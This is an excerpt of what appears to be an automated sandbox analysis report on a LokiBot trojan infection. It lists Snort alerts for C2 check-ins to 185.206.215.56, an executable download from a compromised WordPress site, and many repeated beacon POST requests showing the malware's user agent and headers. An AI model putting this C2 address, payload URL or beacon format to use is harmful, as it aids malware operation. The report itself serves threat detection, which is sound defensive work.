                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49226 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49226 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49226
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49227 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49227 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49227 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49227 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49227
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49228 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49228 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49228 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49228 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49228
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49229 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49229 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49229 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49229 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49229
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49230 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49230 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49230 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49230 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49230
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49231 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49231 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49231 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49231 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49231
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49232 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49232 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49232 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49232 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49232
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49233 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49233 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49233 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49233 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49233
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49234 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49234 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49234 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49234 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49234
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49235 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49235 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49235 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49235 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49235
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49236 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49236 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49236 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49236 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49236
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49237 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49237 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49237 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49237 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49237
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49238 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49238 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49238 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49238 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49238
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49239 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49239 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49239 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49239 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49239
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49240 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49240 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49240 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49240 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49240
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49241 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49241 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49241 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49241 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49241
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49242 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49242 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49242 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49242 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49242
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49243 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49243 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49243 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49243 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49243
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49244 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49244 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49244 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49244 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49244
                Source: global traffic | HTTP traffic detected: GET /wp-content/themes/index/QPR-3067.exe HTTP/1.1 | Host: bighoreca.nl | Connection: Keep-Alive
                Source: Joe Sandbox View | IP Address: 104.22.0.232
                Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
                Source: Joe Sandbox View | ASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL
                Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: global traffic | HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 185.206.215.56 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: 598F9AF4 | Content-Length: 176 | Connection: close
                Source: global traffic | HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 185.206.215.56 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: 598F9AF4 | Content-Length: 149 | Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
